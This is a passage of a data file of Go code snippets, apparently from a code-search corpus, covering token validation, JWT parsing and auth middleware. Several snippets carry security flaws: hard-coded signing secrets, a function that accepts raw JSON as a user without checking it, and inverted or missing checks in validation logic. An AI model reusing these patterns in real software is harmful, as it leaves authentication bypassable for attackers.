case\n\tvar test = func() error {\n\t\turl := fmt.Sprintf(\"http://localhost:%d/api/user\", pact.Server.Port)\n\t\treq, err := http.NewRequest(\"GET\", url, nil)\n\n\t\treq.Header.Set(\"Content-Type\", \"application/json\")\n\t\treq.Header.Set(\"Authorization\", fmt.Sprintf(\"Bearer %s\", invalidToken))\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\t_, err = http.DefaultClient.Do(req)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\treturn err\n\t}\n\n\t// Set up our expected interactions.\n\tpact.\n\t\tAddInteraction().\n\t\tGiven(\"No user exists with the given token valid.\").\n\t\tUponReceiving(\"A request to get user's information with invalid auth token \").\n\t\tWithRequest(dsl.Request{\n\t\t\tMethod: \"GET\",\n\t\t\tPath: dsl.String(\"/api/user\"),\n\t\t\tHeaders: dsl.MapMatcher{\n\t\t\t\t\"Content-Type\": dsl.String(\"application/json\"),\n\t\t\t\t\"Authorization\": dsl.Term(\n\t\t\t\t\tfmt.Sprintf(\"Bearer %s\", invalidToken),\n\t\t\t\t\tfmt.Sprintf(\"^Bearer %s$\", jwsRegex),\n\t\t\t\t),\n\t\t\t},\n\t\t}).\n\t\tWillRespondWith(dsl.Response{\n\t\t\tStatus: 401,\n\t\t\tHeaders: dsl.MapMatcher{\"Content-Type\": dsl.String(\"application/vnd.api+json\")},\n\t\t\tBody: dsl.Match(InvalidToken{}),\n\t\t})\n\n\t// Verify\n\tif err := pact.Verify(test); err != nil {\n\t\tlog.Fatalf(\"Error on Verify: %v\", err)\n\t}\n}", "func ExtracToken(request * http.Request) (string) {\n keys := request.URL.Query()\n token := keys.Get(\"token\")\n \n if token != \"\" {\n\t return token\n }\n\n bearToken := request.Header.Get(\"Authorization\")\n //Authorization the token\n\n strArr := strings.Split(bearToken,\" \")\n if len(strArr) == 2 {\n\t return strArr[1]\n }\n return \"\"\n}", "func validateAccessToken(token string, providedUsername string) bool {\n\tidpHost, idpPort := resolveIdpHostAndPort()\n\turl := \"https://\" + idpHost + \":\" + idpPort + \"/oauth2/introspect\"\n\tpayload := strings.NewReader(\"token=\" + token)\n\treq, err := http.NewRequest(\"POST\", url, payload)\n\tif err != nil {\n\t\tglog.Error(\"Error creating new request to the introspection endpoint: \", err)\n\t\textension.Exit(extension.ErrorExitCode)\n\t}\n\n\tusername, password := resolveCredentials()\n\treq.SetBasicAuth(username, password)\n\tres, err := http.DefaultClient.Do(req)\n\tif err != nil {\n\t\tglog.Error(\"Error sending the request to the introspection endpoint: \", err)\n\t\textension.Exit(extension.ErrorExitCode)\n\t}\n\tdefer res.Body.Close()\n\tbody, err := ioutil.ReadAll(res.Body)\n\tif err != nil {\n\t\tglog.Error(\"Error reading the response from introspection endpoint: \", err)\n\t\textension.Exit(extension.ErrorExitCode)\n\t}\n\tvar result map[string]interface{}\n\terr = json.Unmarshal([]byte(string(body)), &result)\n\tif err != nil {\n\t\tglog.Error(\"Error un marshalling the json: \", err)\n\t\textension.Exit(extension.ErrorExitCode)\n\t}\n\tisActive, ok := (result[\"active\"]).(bool)\n\tif !ok {\n\t\tglog.Error(\"Error casting active to boolean. This may be due to a invalid token\")\n\t\textension.Exit(extension.ErrorExitCode)\n\t}\n\tisExpired := isExpired(result[\"exp\"])\n\tisValidUser := isValidUser(result[\"username\"], providedUsername)\n\treturn isExpired && isActive && isValidUser\n}", "func TokenValid(tokenString string) error {\n\ttoken, err := VerifyToken(tokenString)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif _, ok := token.Claims.(jwt.Claims); !ok && !token.Valid {\n\t\treturn err\n\t}\n\treturn nil\n}", "func validateIDToken(rawIDToken string) (string,error) {\n\t\n\t// Create verifier\n\tctx := context.Background()\n\tprovider, err := oidc.NewProvider(ctx, \"https://accounts.google.com\")\n\tif err != nil {\n\t\treturn \"\",err\n\t}\n\toidcConfig := &oidc.Config{\n\t\tClientID: clientID,\n\t}\n\tverifier := provider.Verifier(oidcConfig)\n\n\t// Verify id token\n\tidToken, err := verifier.Verify(ctx, rawIDToken)\n\tif err != nil {\n\t\treturn \"\",err\n\t}\n\n\t// Parse token to JSON\n\tparsed := new(json.RawMessage)\n\tif err := idToken.Claims(parsed); err != nil {\n\t\treturn \"\",err\n\t}\n\n\t// Render json as string\n\tdata, err := json.MarshalIndent(parsed, \"\", \" \")\n\tif err != nil {\n\t\treturn \"\",err\n\t}\n\treturn string(data),nil\n}", "func Token(token string) (interface{}, error) {\n\tif token == \"\" {\n\t\treturn nil, nil // unauthorized\n\t}\n\n\t// In a real authentication, here we should actually validate that the token is valid\n\tvar user User\n\terr := json.Unmarshal([]byte(token), &user)\n\treturn &user, err\n}", "func restrictedHandler(w http.ResponseWriter, r *http.Request) {\n\t// Get token from request\n\ttoken, err := request.ParseFromRequest(r, request.OAuth2Extractor, func(token *jwt.Token) (interface{}, error) {\n\t\t// since we only use the one private key to sign the tokens,\n\t\t// we also only use its public counter part to verify\n\t\treturn verifyKey, nil\n\t}, request.WithClaims(&CustomClaimsExample{}))\n\n\t// If the token is missing or invalid, return error\n\tif err != nil {\n\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\tfmt.Fprintln(w, \"Invalid token:\", err)\n\t\treturn\n\t}\n\n\t// Token is valid\n\tfmt.Fprintln(w, \"Welcome,\", token.Claims.(*CustomClaimsExample).Name)\n}", "func ValidateToken(token string, ignoreMissing bool) error {\n\tif token == \"\" {\n\t\tif ignoreMissing {\n\t\t\treturn nil\n\t\t}\n\t\treturn fmt.Errorf(\"missing token in config file\")\n\t}\n\tif len(token) != 23 {\n\t\treturn fmt.Errorf(\"invalid token length (%d)\", len(token))\n\t}\n\ttokenRE := regexp.MustCompile(\"^[a-z0-9]{6}\\\\.[a-z0-9]{16}$\")\n\tif tokenRE.MatchString(token) {\n\t\treturn nil\n\t}\n\treturn fmt.Errorf(\"token is invalid %q\", token)\n}", "func (svc *basicAuthNService) ValidateToken(tokenString, kid string) (dto.CustomClaim, error) {\n\tclaim := dto.CustomClaim{}\n\n\tkf := func(token *stdjwt.Token) (interface{}, error) {\n\t\tkeyID := token.Header[\"kid\"].(string)\n\t\tif keyID != kid {\n\t\t\treturn claim, stdjwt.ErrInvalidKeyType\n\t\t}\n\t\treturn []byte(svcconf.C.Auth.SecretKey), nil\n\t}\n\n\ttoken, err := stdjwt.ParseWithClaims(tokenString, &claim, kf)\n\n\t// check if signature is valid\n\tif err != nil {\n\t\treturn claim, err\n\t}\n\tif token.Valid {\n\t\treturn claim, nil\n\t}\n\treturn claim, kitjwt.ErrTokenInvalid\n}", "func (r Resolver) ValidateToken(ctx context.Context, args validateTokenArgs) (*ValidateTokenPayloadResolver, error) {\n\tres, err := r.client.ValidateToken(ctx, &pb.ValidateTokenReq{\n\t\tID: gqlIDToString(args.Input.ID),\n\t\tIP: ctx.Value(middleware.RemoteAddrKey).(string),\n\t\tToken: args.Input.Token,\n\t})\n\treturn validateTokenPayloadRes(res, err)\n}", "func ProcessToken(tk string) (*models.Claim, bool, string, error) {\n\t//Para poder decodificar el token\n\tmyPwd := []byte(\"MiClaveUltraSECRETA\")\n\n\t//jwt exige que sea un puntero\n\tclaims := &models.Claim{}\n\n\tsplitToken := strings.Split(tk, \"Bearer\")\n\tif len(splitToken) != 2 {\n\t\treturn claims, false, string(\"\"), errors.New(\"token format invalid\")\n\t}\n\n\ttk = strings.TrimSpace(splitToken[1])\n\n\t//Sintaxis para verificar si el token es valido y mapear el token dentro de claims\n\ttkn, err := jwt.ParseWithClaims(tk, claims, func(token *jwt.Token) (interface{}, error) {\n\t\treturn myPwd, nil\n\t})\n\tif err == nil {\n\t\t//Si el token es válido lo primero que validamos es si el email existe en la BD\n\t\t_, userFound, _ := bd.UserExists(claims.Email)\n\t\tif userFound {\n\t\t\tEmail = claims.Email\n\t\t\tUserID = claims.ID.Hex()\n\t\t}\n\t\treturn claims, userFound, UserID, nil\n\t}\n\tif !tkn.Valid {\n\t\treturn claims, false, string(\"\"), errors.New(\"invalid token\")\n\t}\n\n\treturn claims, false, string(\"\"), err\n}", "func (api *API) RequireToken(fn http.HandlerFunc) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tauth := r.Header.Get(\"Authorization\")\n\t\twant := fmt.Sprintf(\"Bearer %s\", api.Token)\n\t\tif auth != want {\n\t\t\tw.WriteHeader(http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t\tlog.Debug(\"Valid token found.\")\n\t\tfn(w, r)\n\t}\n}", "func ValidateMiddleware(next http.HandlerFunc) http.HandlerFunc {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, req *http.Request) {\n\t\tauthorizationHeader := req.Header.Get(\"authorization\")\n\t\tif authorizationHeader != \"\" {\n\t\t\tbearerToken := strings.Split(authorizationHeader, \" \")\n\t\t\tif len(bearerToken) == 2 {\n\t\t\t\ttoken, error := jwt.Parse(bearerToken[1], func(token *jwt.Token) (interface{}, error) {\n\t\t\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\t\t\t\treturn nil, fmt.Errorf(\"There was an error\")\n\t\t\t\t\t}\n\t\t\t\t\treturn []byte(\"secret\"), nil\n\t\t\t\t})\n\t\t\t\tif error != nil {\n\t\t\t\t\tjson.NewEncoder(w).Encode(models.Exception{Message: error.Error()})\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t\tif token.Valid {\n\t\t\t\t\tcontext.Set(req, \"decoded\", token.Claims)\n\n\t\t\t\t\tnext(w, req)\n\t\t\t\t} else {\n\t\t\t\t\tjson.NewEncoder(w).Encode(models.Exception{Message: \"Invalid authorization token\"})\n\t\t\t\t}\n\t\t\t}\n\t\t} else {\n\t\t\tjson.NewEncoder(w).Encode(models.Exception{Message: \"An authorization header is required\"})\n\t\t}\n\t})\n}", "func ERROR_AUTH_TOKEN_INVALID(w http.ResponseWriter) {\n\tbuildForeignError(w, http.StatusForbidden, \"ERROR_AUTH_TOKEN_INVALID\", \"\")\n}", "func (ja *JwtAuth) Verifier(next http.Handler) http.Handler {\n\treturn ja.Verify(\"\")(next)\n}", "func (i *ITwoFactorService) ValidateToken() (*geyser.Request, error) {\n\tsm, err := i.Interface.Methods.Get(schema.MethodKey{\n\t\tName: \"ValidateToken\",\n\t\tVersion: 1,\n\t})\n\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq := geyser.NewRequest(i.Interface, sm)\n\n\treturn req, nil\n}", "func (m *TokenExtra) Validate(formats strfmt.Registry) error {\n\tvar res []error\n\n\tif err := m.validateExpiresIn(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateServerTime(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateToken(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif err := m.validateValid(formats); err != nil {\n\t\tres = append(res, err)\n\t}\n\n\tif len(res) > 0 {\n\t\treturn errors.CompositeValidationError(res...)\n\t}\n\treturn nil\n}", "func ValidateToken(tokenString string) (string, error) {\n\tsecret := []byte(\"kalle4ever\")\n\ttoken, err := jwt.Parse(tokenString, func(token *jwt.Token) (interface{}, error) {\n\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\treturn nil, fmt.Errorf(\"Unexpected signing method: %v\", token.Header[\"alg\"])\n\t\t}\n\n\t\treturn secret, nil\n\t})\n\n\tif claims, ok := token.Claims.(jwt.MapClaims); ok && token.Valid {\n\t\treturn claims[\"username\"].(string), nil\n\t}\n\treturn \"\", err\n}", "func JwtFilter() gin.HandlerFunc {\n\treturn func(c *gin.Context) {\n\t\ttokenString := extractToken(c)\n\t\tif tokenString != \"\" {\n\t\t\ttoken, err := validateToken(tokenString)\n\t\t\tif !token.Valid {\n\t\t\t\tfmt.Println(err)\n\t\t\t\tc.AbortWithStatus(http.StatusUnauthorized)\n\t\t\t}\n\t\t} else {\n\t\t\tfmt.Println(\"Authorization Bearer header required\")\n\t\t\tc.AbortWithStatus(http.StatusUnauthorized)\n\t\t}\n\t}\n}", "func validatetoken(dao DAO) echo.MiddlewareFunc {\n\treturn func(next echo.HandlerFunc) echo.HandlerFunc {\n\t\treturn func(c echo.Context) error {\n\n\t\t\tcook, err := c.Cookie(\"jwt\")\n\t\t\tif err != nil {\n\t\t\t\tif err == http.ErrNoCookie {\n\t\t\t\t\t// If the cookie is not set, return an unauthorized status\n\t\t\t\t\treturn c.String(http.StatusUnauthorized, \"You are not authorized\")\n\t\t\t\t}\n\t\t\t\t// For any other type of error, return a bad request status\n\t\t\t\treturn c.String(http.StatusBadRequest, \"Bad Request A\")\n\t\t\t}\n\n\t\t\t// Get the JWT string from the cookie\n\t\t\ttknStr := cook.Value\n\n\t\t\t// Initialize a new instance of `Claims`\n\t\t\tclaims := &m.Claims{}\n\n\t\t\t// Parse the JWT string and store the result in `claims`.\n\t\t\t// Note that we are passing the key in this method as well. This method will return an error\n\t\t\t// if the token is invalid (if it has expired according to the expiry time we set on sign in),\n\t\t\t// or if the signature does not match\n\t\t\ttkn, err := jwt.ParseWithClaims(tknStr, claims, func(token *jwt.Token) (interface{}, error) {\n\t\t\t\treturn jwtKey, nil\n\t\t\t})\n\t\t\tif err != nil {\n\t\t\t\tif err == jwt.ErrSignatureInvalid {\n\t\t\t\t\treturn c.String(http.StatusUnauthorized, fmt.Sprintf(\"You are Not Authorized %v:%s:%v\", err, err.Error(), jwt.ErrSignatureInvalid))\n\t\t\t\t}\n\t\t\t\treturn c.String(http.StatusBadRequest, fmt.Sprintf(\"Bad Request B %v:%s:%v\", err, err.Error(), jwt.ErrSignatureInvalid))\n\t\t\t}\n\t\t\tif !tkn.Valid {\n\t\t\t\treturn c.String(http.StatusUnauthorized, \"You are not authorized\")\n\t\t\t}\n\n\t\t\tprofilesexist, err := dao.DoesProfileExist(claims.ProfileId)\n\t\t\tif err != nil || !profilesexist {\n\t\t\t\treturn c.String(http.StatusUnauthorized, \"You are not authorized: 10101\")\n\t\t\t}\n\n\t\t\t// We ensure that a new token is not issued until enough time has elapsed\n\t\t\t// In this case, a new token will only be issued if the old token is within\n\t\t\t// 30 seconds of expiry. otherwise.. leave everything be\n\t\t\tif time.Unix(claims.ExpiresAt, 0).Sub(time.Now()) < 30*time.Second {\n\n\t\t\t\t// Now, create a new token for the current use, with a renewed expiration time\n\t\t\t\texpirationTime := time.Now().Add(5 * time.Minute)\n\t\t\t\tclaims.ExpiresAt = expirationTime.Unix()\n\t\t\t\ttoken := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)\n\t\t\t\ttokenString, err := token.SignedString(jwtKey)\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn c.String(http.StatusInternalServerError, \"Crazy ass internal error\")\n\t\t\t\t}\n\t\t\t\tc.SetCookie(&http.Cookie{\n\t\t\t\t\tName: \"jwt\",\n\t\t\t\t\tValue: tokenString,\n\t\t\t\t\tExpires: expirationTime,\n\t\t\t\t})\n\n\t\t\t}\n\t\t\treturn next(c)\n\t\t}\n\t}\n}", "func ValidateUser(next http.HandlerFunc) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\t// parse authorization header\n\t\tauthHeader := strings.Split(r.Header.Get(\"Authorization\"), \"Bearer \")\n\t\tif len(authHeader) != 2 {\n\t\t\thttp.Error(w, \"Malformed token\", http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\n\t\tlog.TraceWithFields(\n\t\t\t\"Request token\",\n\t\t\tmap[string]interface{}{\"token\": authHeader},\n\t\t)\n\n\t\t// validate token\n\t\tclaims := jwt.MapClaims{}\n\n\t\ttoken, err := jwt.ParseWithClaims(authHeader[1], &claims, func(token *jwt.Token) (interface{}, error) {\n\t\t\treturn []byte(config.GetConfig().JwtSecret), nil\n\t\t})\n\n\t\tif err != nil || !token.Valid {\n\t\t\thttp.Error(w, \"Invalid token\", http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\n\t\tctx := context.WithValue(r.Context(), \"user_id\", claims[\"user_id\"])\n\n\t\tnext.ServeHTTP(w, r.WithContext(ctx))\n\t}\n}", "func (g *grpcWrapper) validateToken(logger *zap.Logger, token string) (string, error) {\n\tlogger.Debug(\"validateToken called\")\n\tif g.skipAuth {\n\t\tlogger.Debug(\"validateToken short-circuited due to SKIP AUTH\")\n\t\treturn \"11\", nil\n\t}\n\tserverAuthToken, err := serverAuth(logger, g.authURL, g.authUser, g.authPassword)\n\tif err != nil {\n\t\tlogger.Debug(\"validateToken error from serverAuth\", zap.Error(err))\n\t\treturn \"\", err\n\t}\n\treq, err := http.NewRequest(\"GET\", g.authURL+\"v3/auth/tokens\", nil)\n\tif err != nil {\n\t\tlogger.Debug(\"validateToken error from NewRequest GET\", zap.Error(err))\n\t\treturn \"\", err\n\t}\n\treq.Header.Set(\"X-Auth-Token\", serverAuthToken)\n\treq.Header.Set(\"X-Subject-Token\", token)\n\tresp, err := http.DefaultClient.Do(req)\n\tif err != nil {\n\t\tlogger.Debug(\"validateToken error from DefaultClient.Do GET\", zap.Error(err))\n\t\treturn \"\", err\n\t}\n\tdefer resp.Body.Close()\n\tif resp.StatusCode != 200 {\n\t\tlogger.Debug(\"validateToken error from GET return status\", zap.Int(\"status\", resp.StatusCode))\n\t\treturn \"\", fmt.Errorf(\"token validation gave status %d\", resp.StatusCode)\n\t}\n\tvar validateResp validateTokenResponse\n\tr, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\tlogger.Debug(\"validateToken error from GET ReadAll body\", zap.Error(err))\n\t\treturn \"\", err\n\t}\n\tif err = json.Unmarshal(r, &validateResp); err != nil {\n\t\tlogger.Debug(\"validateToken error from GET json.Unmarshal\", zap.Error(err))\n\t\treturn \"\", err\n\t}\n\tlogger.Debug(\"validateToken succeeded\", zap.String(\"Project.ID\", validateResp.Token.Project.ID))\n\treturn validateResp.Token.Project.ID, nil\n}", "func (s *Session) Validate(handler http.HandlerFunc) http.HandlerFunc {\n\tlog.Println(\"*******************In Validate1*******************\")\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tcookie, err := r.Cookie(\"Auth\")\n\t\tif err != nil {\n\t\t\tctx := context.WithValue(r.Context(), myKey, &claims{\"anonymous\", 0, \"\", \"\", \"\", jwt.StandardClaims{}})\n\t\t\thandler(w, r.WithContext(ctx))\n\t\t\t// http.NotFound(w, r)\n\t\t\treturn\n\t\t}\n\t\ttoken, err := jwt.ParseWithClaims(cookie.Value, &claims{}, func(token *jwt.Token) (interface{}, error) {\n\t\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\t\treturn nil, fmt.Errorf(\"Unexpected signing method\")\n\t\t\t}\n\t\t\treturn []byte(\"sEcrEtPassWord!234\"), nil\n\t\t})\n\t\tif err != nil {\n\t\t\thttp.NotFound(w, r)\n\t\t\treturn\n\t\t}\n\t\tif userClaims, ok := token.Claims.(*claims); ok && token.Valid {\n\t\t\tuserClaims.Token = token.Raw\n\t\t\tctx := context.WithValue(r.Context(), myKey, *userClaims)\n\t\t\thandler(w, r.WithContext(ctx))\n\t\t} else {\n\t\t\thttp.NotFound(w, r)\n\t\t\treturn\n\t\t}\n\t})\n}", "func ValidateTokens(v TokenValidator, h http.Handler) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tif token := getToken(r); !v.ValidToken(token) {\n\t\t\tUnauthorized(w)\n\t\t\treturn\n\t\t}\n\n\t\th.ServeHTTP(w, r)\n\t})\n}", "func (p *Provider) ValidateIdentityParams(ctx context.Context, code, cookie, state string) (t *Token, err error) {\n\tt, _, err = p.ValidateIdentityParamsWithUserdata(ctx, code, cookie, state)\n\treturn\n}", "func (s *server) CheckToken(ctx context.Context, in *pb.LogRequest) (*pb.LogResponse, error) {\n\tlog.Printf(\"Received: %v\", \"Check token\")\n\tis, err := CheckToken(in.Email, in.Token)\n\tif err != nil {\n\t\treturn &pb.LogResponse{Sucess: false}, nil\n\t}\n\treturn &pb.LogResponse{Sucess: is}, nil\n}", "func Token(token string) func(http.Handler) http.Handler {\n\treturn func(next http.Handler) http.Handler {\n\t\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\t\tif token == \"\" {\n\t\t\t\tnext.ServeHTTP(w, r)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\theader := r.Header.Get(\"Authorization\")\n\n\t\t\tif header == \"\" {\n\t\t\t\thttp.Error(w, ErrInvalidToken.Error(), http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tif header != \"Bearer \"+token {\n\t\t\t\thttp.Error(w, ErrInvalidToken.Error(), http.StatusUnauthorized)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tnext.ServeHTTP(w, r)\n\t\t})\n\t}\n}", "func validateToken(t string) error {\n\tidx := strings.IndexFunc(t, func(c rune) bool {\n\t\treturn !unicode.IsPrint(c)\n\t})\n\tif idx != -1 {\n\t\treturn fmt.Errorf(\"configured Vault token contains non-printable characters and cannot be used\")\n\t}\n\treturn nil\n}", "func Validate(h goji.Handler) goji.Handler {\n\t// passing h as error handler so that if an error occurs, it (h) is called\n\t// after setting the \"TokenError\" context variable.\n\treturn generateHandler(h, h)\n}", "func (u *User) ValidateToken(ctx context.Context, inToken *pb.Token, outToken *pb.Token) error {\n\t_ = ctx\n\tts := TokenService{}\n\tclaims, err := ts.Decode(inToken.Token)\n\tif err != nil {\n\t\treturn err\n\t}\n\tif claims == nil {\n\t\treturn fmt.Errorf(glErr.AuthNilClaim(serviceName))\n\t}\n\tif claims.User.Id == 0 || claims.Issuer != ClaimIssuer {\n\t\t// fmt.Printf(\"claim User %v\", claims.User)\n\t\treturn fmt.Errorf(glErr.AuthInvalidClaim(serviceName))\n\t}\n\t// fmt.Printf(\"Claim User %v\", claims.User)\n\t// TODO: Check that userid is a valid user in db\n\n\toutToken.Token = inToken.Token\n\toutToken.Valid = true\n\toutToken.EUid = base64.StdEncoding.EncodeToString([]byte(strconv.FormatInt(claims.User.Id, 10)))\n\n\treturn nil\n\n}", "func Token(req *http.Request) string {\n\tctx, ok := req.Context().Value(nosurfKey).(*csrfContext)\n\tif !ok {\n\t\treturn \"\"\n\t}\n\n\treturn ctx.token\n}", "func (ut *accountVerificationInputPayload) Validate() (err error) {\n\tif ut.VerificationToken != nil {\n\t\tif utf8.RuneCountInString(*ut.VerificationToken) < 108 {\n\t\t\terr = goa.MergeErrors(err, goa.InvalidLengthError(`response.verification_token`, *ut.VerificationToken, utf8.RuneCountInString(*ut.VerificationToken), 108, true))\n\t\t}\n\t}\n\treturn\n}", "func (mt *Mytoken) Valid() error {\n\tstandardClaims := jwt.StandardClaims{\n\t\tAudience: mt.Audience,\n\t\tExpiresAt: int64(mt.ExpiresAt),\n\t\tId: mt.ID.String(),\n\t\tIssuedAt: int64(mt.IssuedAt),\n\t\tIssuer: mt.Issuer,\n\t\tNotBefore: int64(mt.NotBefore),\n\t\tSubject: mt.Subject,\n\t}\n\tif err := errors.WithStack(standardClaims.Valid()); err != nil {\n\t\treturn err\n\t}\n\tif ok := standardClaims.VerifyIssuer(config.Get().IssuerURL, true); !ok {\n\t\treturn errors.New(\"invalid issuer\")\n\t}\n\tif ok := standardClaims.VerifyAudience(config.Get().IssuerURL, true); !ok {\n\t\treturn errors.New(\"invalid Audience\")\n\t}\n\tif ok := mt.verifyID(); !ok {\n\t\treturn errors.New(\"invalid id\")\n\t}\n\tif ok := mt.verifySubject(); !ok {\n\t\treturn errors.New(\"invalid subject\")\n\t}\n\treturn nil\n}", "func (mt *Mytoken) Valid() error {\n\tstandardClaims := jwt.StandardClaims{\n\t\tAudience: mt.Audience,\n\t\tExpiresAt: int64(mt.ExpiresAt),\n\t\tId: mt.ID.String(),\n\t\tIssuedAt: int64(mt.IssuedAt),\n\t\tIssuer: mt.Issuer,\n\t\tNotBefore: int64(mt.NotBefore),\n\t\tSubject: mt.Subject,\n\t}\n\tif err := errors.WithStack(standardClaims.Valid()); err != nil {\n\t\treturn err\n\t}\n\tif ok := standardClaims.VerifyIssuer(config.Get().IssuerURL, true); !ok {\n\t\treturn errors.New(\"invalid issuer\")\n\t}\n\tif ok := standardClaims.VerifyAudience(config.Get().IssuerURL, true); !ok {\n\t\treturn errors.New(\"invalid Audience\")\n\t}\n\tif ok := mt.verifyID(); !ok {\n\t\treturn errors.New(\"invalid id\")\n\t}\n\tif ok := mt.verifySubject(); !ok {\n\t\treturn errors.New(\"invalid subject\")\n\t}\n\treturn nil\n}", "func (ut *AccountVerificationInputPayload) Validate() (err error) {\n\tif ut.VerificationToken != nil {\n\t\tif utf8.RuneCountInString(*ut.VerificationToken) < 108 {\n\t\t\terr = goa.MergeErrors(err, goa.InvalidLengthError(`response.verification_token`, *ut.VerificationToken, utf8.RuneCountInString(*ut.VerificationToken), 108, true))\n\t\t}\n\t}\n\treturn\n}", "func ValidateAccessToken(w http.ResponseWriter, r *http.Request) {\n\tvar token tokendata\n\tauthHeader := r.Header.Get(\"Authorization\")\n\tif authHeader == \"\" {\n\t\tbody, err := ioutil.ReadAll(r.Body)\n\t\tif err != nil {\n\t\t\tlog.Error(err)\n\t\t\thttp.Error(w, \"\", http.StatusInternalServerError)\n\t\t\treturn\n\t\t}\n\n\t\terr = json.Unmarshal(body, &token)\n\t\tif err != nil {\n\t\t\tlog.Error(err)\n\t\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\t}\n\t}\n\ttoken.Accestoken = authHeader\n\t_, err := token.Validate()\n\tif err != nil {\n\t\tlog.Error(err)\n\t\thttp.Error(w, \"\", http.StatusForbidden)\n\t\treturn\n\t}\n}", "func ValidateToken(myToken string) (bool, string) {\n\ttoken, err := jwt.ParseWithClaims(myToken, &CustomClaims{}, func(token *jwt.Token) (interface{}, error) {\n\t\treturn []byte(jwtKey), nil\n\t})\n\n\tif err != nil {\n\t\treturn false, \"\"\n\t}\n\n\tclaims := token.Claims.(*CustomClaims)\n\treturn token.Valid, claims.Username\n}", "func ValidateToken(host string, token string) (err error) {\n\treq, err := http.NewRequest(\"GET\", host+\"/api/system/ping\", nil)\n\tif err != nil {\n\t\treturn err\n\t}\n\treq.SetBasicAuth(token, \"\")\n\tpingResp, err := http.DefaultClient.Do(req)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tdefer pingResp.Body.Close()\n\tbody, err := ioutil.ReadAll(pingResp.Body)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif pingResp.StatusCode != 200 {\n\t\treturn fmt.Errorf(\"❌ Invalid token, status code expected 200 got %d\", pingResp.StatusCode)\n\t} else if string(body) != \"pong\" {\n\t\tmaxlen := len(body)\n\t\tif len(body) > 32 {\n\t\t\tmaxlen = 32\n\t\t}\n\t\treturn fmt.Errorf(\"❌ Invalid host, response expected pong got \\n %s\", string(body[0:maxlen]))\n\t} else {\n\t\treturn nil\n\t}\n}", "func ValidateToken(tokenString string) (bool, error) {\n\t_, err := ParseToken(tokenString)\n\n\t// I'm not interested in getting any of the information off the jwt, just verification and expiration\n\n\tif err != nil {\n\t\treturn false, err\n\t}\n\n\treturn true, nil\n}", "func (a *authSvc) ValidateToken(authHeader interface{}) (interface{}, error) {\n\t// validate an Authorization header token is present in the request\n\tif authHeader == nil {\n\t\treturn nil, errors.New(\"no valid Authorization token in request\")\n\t}\n\theader := authHeader.(string)\n\tif header == \"\" {\n\t\treturn nil, errors.New(\"no valid Authorization token in request\")\n\t}\n\t// validate that it is a Bearer token\n\tif !strings.HasPrefix(header, bearerTokenKey) {\n\t\treturn nil, errors.New(\"authorization token is not valid Bearer token\")\n\t}\n\tt := strings.Replace(header, bearerTokenKey, \"\", -1)\n\t// parse the header token\n\ttoken, err := jwt.Parse(t, func(token *jwt.Token) (interface{}, error) {\n\t\tif _, ok := token.Method.(*jwt.SigningMethodHMAC); !ok {\n\t\t\treturn nil, fmt.Errorf(\"there was an parsing the given token. please validate the token is for this service\")\n\t\t}\n\t\treturn a.authSecret, nil\n\t})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\t// validate token and get claims\n\tif claims, ok := token.Claims.(jwt.MapClaims); ok && token.Valid {\n\t\tvar decodedToken map[string]string\n\t\terr = mapstructure.Decode(claims, &decodedToken)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\treturn decodedToken[\"email\"], nil\n\t}\n\treturn nil, errors.New(\"invalid authorization token\") // token is not valid, return error\n}", "func parseToken(next http.Handler) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tevent := ssas.Event{Op: \"ParseToken\"}\n\t\tauthHeader := r.Header.Get(\"Authorization\")\n\t\tif authHeader == \"\" {\n\t\t\tevent.Help = \"no authorization header found\"\n\t\t\tssas.AuthorizationFailure(event)\n\t\t\tnext.ServeHTTP(w, r)\n\t\t\treturn\n\t\t}\n\n\t\tauthRegexp := regexp.MustCompile(`^Bearer (\\S+)$`)\n\t\tauthSubmatches := authRegexp.FindStringSubmatch(authHeader)\n\t\tif len(authSubmatches) < 2 {\n\t\t\tevent.Help = \"invalid Authorization header value\"\n\t\t\tssas.AuthorizationFailure(event)\n\t\t\tnext.ServeHTTP(w, r)\n\t\t\treturn\n\t\t}\n\n\t\ttokenString := authSubmatches[1]\n\t\ttoken, err := server.VerifyToken(tokenString)\n\t\tif err != nil {\n\t\t\tevent.Help = fmt.Sprintf(\"unable to decode authorization header value; %s\", err)\n\t\t\tssas.AuthorizationFailure(event)\n\t\t\tnext.ServeHTTP(w, r)\n\t\t\treturn\n\t\t}\n\n\t\tvar rd ssas.AuthRegData\n\t\tif rd, err = readRegData(r); err 